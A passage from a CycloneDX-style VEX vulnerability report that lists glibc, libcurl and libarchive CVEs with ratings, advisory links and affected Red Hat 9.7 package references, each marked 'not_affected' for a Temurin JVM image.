"urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libarchive@3.5.3-7.el9_7?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": "Exploitability analysis, additional details:\nTemurin JVM binary is linked only against glibc:\n$ ldd /usr/lib/jvm/temurin-17-jre/bin/java\n linux-vdso.so.1 (0x0000ffff8cd00000)\n libjli.so => /usr/lib/jvm/temurin-17-jre/bin/../lib/libjli.so (0x0000ffff8cc70000)\n libpthread.so.0 => /lib64/libpthread.so.0 (0x0000ffff8cc3b000)\n libdl.so.2 => /lib64/libdl.so.2 (0x0000ffff8cc1a000)\n libc.so.6 => /lib64/libc.so.6 (0x0000ffff8caa4000)\n /lib/ld-linux-aarch64.so.1 (0x0000ffff8ccc2000)" } }, { "id": "CVE-2026-5435", "ratings": [ { "source": { "name": "redhat" }, "score": 5.9, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], "cwes": [ 787 ], "description": "The deprecated functions ns_printrrf, ns_printrr and fp_nquery in the GNU C Library version 2.2 and newer fail to enforce the caller-supplied buffer length, and can result in an out-of-bounds write when printing TSIG records.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5435" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5435" }, { "url": "https://inbox.sourceware.org/libc-announce/7a655d55-276f-41fe-b550-feb3ebb2ce91@redhat.com/T/#u" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5435" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=34033" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5435" } ], "published": "2026-04-28T13:19:22+00:00", "updated": "2026-05-05T17:38:37+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5450", "ratings": [ { "source": { "name": "redhat" }, "score": 5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:N/I:L/A:H" } ], "cwes": [ 122, 787 ], "description": "Calling the scanf family of functions with a %mc (malloc'd character match) in the GNU C Library version 2.7 to version 2.43 with a format width specifier with an explicit width greater than 1024 could result in a one byte heap buffer overflow.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5450" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5450" }, { "url": "https://inbox.sourceware.org/libc-announce/b11f0003-6ec1-4bd6-b9de-9e38a4efeca3@redhat.com/T/#u" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5450" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5450#range-21286997" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=CVE-2026-5450" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5450" } ], "published": "2026-04-20T21:16:36+00:00", "updated": "2026-04-23T15:33:34+00:00", "affects": [ { "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "2.34-231.el9_7.10", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5545", "ratings": [ { "source": { "name": "photon" }, "severity": "high" }, { "source": { "name": "redhat" }, "score": 6.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], "description": "A flaw was found in libcurl. An application using libcurl that performs an authenticated HTTP(S) request after a Negotiate-authenticated one to the same host may incorrectly reuse the previous connection. This authentication bypass vulnerability allows the second request to be sent over a connection authenticated with different credentials, potentially leading to unauthorized access or information disclosure.", "advisories": [ { "url": "https://avd.aquasec.com/nvd/cve-2026-5545" }, { "url": "https://access.redhat.com/security/cve/CVE-2026-5545" }, { "url": "https://curl.se/docs/CVE-2026-5545.html" }, { "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5545" }, { "url": "https://ubuntu.com/security/notices/USN-8227-1" }, { "url": "https://www.cve.org/CVERecord?id=CVE-2026-5545" } ], "affects": [ { "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7", "versions": [ { "version": "7.76.1-35.el9_7.3", "status": "affected" } ] }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" }, { "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7" } ], "analysis": { "state": "not_affected", "justification": "", "response": [ "update" ], "detail": null } }, { "id": "CVE-2026-5704", "ratings": [ { "source": { "name": "nvd" }, "score": 5.5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "redhat" }, "score": 5, "severity": "medium", "method": "CVSSv31", "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N" }, { "source": { "name": "ubuntu" }, "severity": "medium" } ], 